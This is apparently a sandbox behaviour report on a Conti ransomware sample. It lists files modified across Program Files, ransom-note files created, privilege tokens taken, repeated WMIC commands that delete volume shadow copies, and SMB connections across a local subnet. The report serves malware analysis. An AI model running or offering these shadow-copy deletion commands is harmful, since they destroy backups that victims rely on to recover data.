| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02404_.WMF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\feature.xml | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\msadc\handsafe.reg | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\management-agent.jar | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099202.GIF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105388.WMF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE00934_.WMF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\MARQUEE.POC | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\include\jvmti.h | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0299763.WMF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10254_.GIF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\locale\pt_PT\LC_MESSAGES\vlc.mo | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\locale\tt\LC_MESSAGES\vlc.mo | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FRENCH.LNG | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105306.WMF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL083.XML | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\SPPlugins\ADMPlugin.apl | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Etc\GMT+2 | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Riga | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-netbeans-modules-favorites.xml_hidden | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382930.JPG | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\BG_ADOBE.GIF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Bibliography\Style\ISO690.XSL | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+8 | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-multiview.jar | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-masterfs.xml | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\VIEW.ICO | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0182902.WMF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0241781.WMF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309705.JPG | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.nl_zh_4.4.0.v20140623020002.jar | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\rtf_choosefont.gif | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR45B.GIF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AG00129_.GIF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\ug\LC_MESSAGES\R3ADM3.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\R3ADM3.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0332364.WMF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\db\bin\sysinfo.bat | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\STUDIO\PREVIEW.GIF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR43B.GIF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.ui.ja_5.5.0.165303.jar | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\flight_recorder.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Premium.css | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\fontconfig.properties.src | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File created | C:\Program Files\Java\jre7\lib\zi\America\Indiana\R3ADM3.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\PRODIGY.NET.XML | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Push\push_title.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.io_8.1.14.v20131031.jar | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.util_8.1.14.v20131031.jar | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\feature.xml | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309480.JPG | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Pacific\Pago_Pago | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Beige.css | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\feature.properties | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-filesystems.xml | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\EADOCUMENTAPPROVAL_REVIEW.XSN | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\flower_precomp_matte.wmv | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR28F.GIF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolIcons\StatusOnline.ico | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-attach.xml | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0313974.JPG | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\America\Dawson | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\lua\http\images\Back-48.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe"
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\system32\cmd.exe
cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{84B23760-D083-4387-974D-3C4546D42F6A}'" delete
C:\Windows\System32\wbem\WMIC.exe
C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{84B23760-D083-4387-974D-3C4546D42F6A}'" delete
C:\Windows\system32\cmd.exe
cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{7F4FF19A-F0A9-4D37-804C-BBA1AC496F39}'" delete
C:\Windows\System32\wbem\WMIC.exe
C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{7F4FF19A-F0A9-4D37-804C-BBA1AC496F39}'" delete
C:\Windows\system32\cmd.exe
cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{9F6E7A5F-91E3-42B9-9E2A-D87FADA45EB4}'" delete
C:\Windows\System32\wbem\WMIC.exe
C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{9F6E7A5F-91E3-42B9-9E2A-D87FADA45EB4}'" delete
C:\Windows\system32\cmd.exe
cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{314E70DD-6CC8-441F-8B30-A71AFD3666D4}'" delete
C:\Windows\System32\wbem\WMIC.exe
C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{314E70DD-6CC8-441F-8B30-A71AFD3666D4}'" delete
C:\Windows\system32\cmd.exe
cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{F28370CD-B12E-4E29-BDEC-FADD070A311C}'" delete
C:\Windows\System32\wbem\WMIC.exe
C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{F28370CD-B12E-4E29-BDEC-FADD070A311C}'" delete
C:\Windows\system32\cmd.exe
cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{9CFA1FAC-8B30-464C-A41C-E8A415E47E56}'" delete
C:\Windows\System32\wbem\WMIC.exe
C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{9CFA1FAC-8B30-464C-A41C-E8A415E47E56}'" delete
C:\Windows\system32\cmd.exe
cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{CE807F35-9C0E-4446-B318-8485AF6C0259}'" delete
C:\Windows\System32\wbem\WMIC.exe
C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{CE807F35-9C0E-4446-B318-8485AF6C0259}'" delete
C:\Windows\system32\cmd.exe
cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{ED089E91-80BF-4ED9-8981-C380E00AF48A}'" delete
C:\Windows\System32\wbem\WMIC.exe
C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{ED089E91-80BF-4ED9-8981-C380E00AF48A}'" delete
C:\Windows\system32\cmd.exe
cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{D1A50FE4-92ED-419B-8E4F-FD59A2FB70FF}'" delete
C:\Windows\System32\wbem\WMIC.exe
C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{D1A50FE4-92ED-419B-8E4F-FD59A2FB70FF}'" delete
C:\Windows\system32\cmd.exe
cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{95BCBF4B-AB01-429A-BC22-D699995F488D}'" delete
C:\Windows\System32\wbem\WMIC.exe
C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{95BCBF4B-AB01-429A-BC22-D699995F488D}'" delete
C:\Windows\system32\cmd.exe
cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{D3411E52-7961-4272-BD9B-AC00A7C176FD}'" delete
C:\Windows\System32\wbem\WMIC.exe
C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{D3411E52-7961-4272-BD9B-AC00A7C176FD}'" delete
C:\Windows\system32\cmd.exe
cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{5A5BC5FA-1945-4C64-98AB-48EB9B258476}'" delete
C:\Windows\System32\wbem\WMIC.exe
C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{5A5BC5FA-1945-4C64-98AB-48EB9B258476}'" delete
C:\Windows\system32\cmd.exe
cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{4209BC2E-63F3-4311-B318-4266CE6427FD}'" delete
C:\Windows\System32\wbem\WMIC.exe
C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{4209BC2E-63F3-4311-B318-4266CE6427FD}'" delete
C:\Windows\system32\cmd.exe
cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{0FB96D71-416E-4221-B050-53851A8DFEFF}'" delete
C:\Windows\System32\wbem\WMIC.exe
C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{0FB96D71-416E-4221-B050-53851A8DFEFF}'" delete
C:\Windows\system32\cmd.exe
cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{CA9D1DC0-6918-4793-9B97-17DC4DC11B7A}'" delete
C:\Windows\System32\wbem\WMIC.exe
C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{CA9D1DC0-6918-4793-9B97-17DC4DC11B7A}'" delete
C:\Windows\system32\cmd.exe
cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{5F3413EA-0DE7-4717-9100-512425AA05AF}'" delete
C:\Windows\System32\wbem\WMIC.exe
C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{5F3413EA-0DE7-4717-9100-512425AA05AF}'" delete
C:\Windows\system32\cmd.exe
cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{B69ED39F-CDDB-47E0-81FC-5EF4BC215C92}'" delete
C:\Windows\System32\wbem\WMIC.exe
C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{B69ED39F-CDDB-47E0-81FC-5EF4BC215C92}'" delete
C:\Windows\system32\cmd.exe
cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{C44555B4-BF9B-4600-B9BC-43446450A014}'" delete
C:\Windows\System32\wbem\WMIC.exe
C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{C44555B4-BF9B-4600-B9BC-43446450A014}'" delete
Network
| Country | Destination | Domain | Proto |
| N/A | 10.127.0.1:445 | tcp | |
| N/A | 10.127.0.49:445 | tcp | |
| N/A | 10.127.0.64:445 | tcp | |
| N/A | 10.127.0.11:445 | tcp | |
| N/A | 10.127.0.13:445 | tcp | |
| N/A | 10.127.0.3:445 | tcp | |
| N/A | 10.127.0.35:445 | tcp | |
| N/A | 10.127.0.16:445 | tcp | |
| N/A | 10.127.0.54:445 | tcp | |
| N/A | 10.127.0.29:445 | tcp | |
| N/A | 10.127.0.59:445 | tcp | |
| N/A | 10.127.0.36:445 | tcp | |
| N/A | 10.127.0.51:445 | tcp | |
| N/A | 10.127.0.60:445 | tcp | |
| N/A | 10.127.0.45:445 | tcp | |
| N/A | 10.127.0.42:445 | tcp | |
| N/A | 10.127.0.50:445 | tcp | |
| N/A | 10.127.0.48:445 | tcp | |
| N/A | 10.127.0.12:445 | tcp | |
| N/A | 10.127.0.39:445 | tcp | |
| N/A | 10.127.0.18:445 | tcp | |
| N/A | 10.127.0.19:445 | tcp | |
| N/A | 10.127.0.55:445 | tcp | |
| N/A | 10.127.0.133:445 | tcp | |
| N/A | 10.127.0.33:445 | tcp | |
| N/A | 10.127.0.47:445 | tcp | |
| N/A | 10.127.0.34:445 | tcp | |
| N/A | 10.127.0.2:445 | tcp | |
| N/A | 10.127.0.17:445 | tcp | |
| N/A | 10.127.0.23:445 | tcp | |
| N/A | 10.127.0.40:445 | tcp | |
| N/A | 10.127.0.30:445 | tcp | |
| N/A | 10.127.0.44:445 | tcp | |
| N/A | 10.127.0.53:445 | tcp | |
| N/A | 10.127.0.25:445 | tcp | |
| N/A | 10.127.0.132:445 | tcp | |
| N/A | 10.127.0.37:445 | tcp | |
| N/A | 10.127.0.38:445 | tcp | |
| N/A | 10.127.0.27:445 | tcp | |
| N/A | 10.127.0.63:445 | tcp | |
| N/A | 10.127.0.22:445 | tcp | |
| N/A | 10.127.0.41:445 | tcp | |
| N/A | 10.127.0.52:445 | tcp | |
| N/A | 10.127.0.26:445 | tcp | |
| N/A | 10.127.0.65:445 | tcp | |
| N/A | 10.127.0.7:445 | tcp | |
| N/A | 10.127.0.10:445 | tcp | |
| N/A | 10.127.0.56:445 | tcp | |
| N/A | 10.127.0.8:445 | tcp | |
| N/A | 10.127.0.32:445 | tcp | |
| N/A | 10.127.0.4:445 | tcp | |
| N/A | 10.127.0.31:445 | tcp | |
| N/A | 10.127.0.28:445 | tcp | |
| N/A | 10.127.0.24:445 | tcp | |
| N/A | 10.127.0.15:445 | tcp | |
| N/A | 10.127.0.6:445 | tcp | |
| N/A | 10.127.0.20:445 | tcp | |
| N/A | 10.127.0.61:445 | tcp | |
| N/A | 10.127.0.5:445 | tcp | |
| N/A | 10.127.0.58:445 | tcp | |
| N/A | 10.127.0.43:445 | tcp | |
| N/A | 10.127.0.62:445 | tcp | |
| N/A | 10.127.0.0:445 | tcp | |
| N/A | 10.127.0.21:445 | tcp | |
| N/A | 10.127.0.46:445 | tcp | |
| N/A | 10.127.0.9:445 | tcp | |
| N/A | 10.127.0.14:445 | tcp | |
| N/A | 10.127.0.57:445 | tcp | |
| N/A | 10.127.0.102:445 | tcp | |
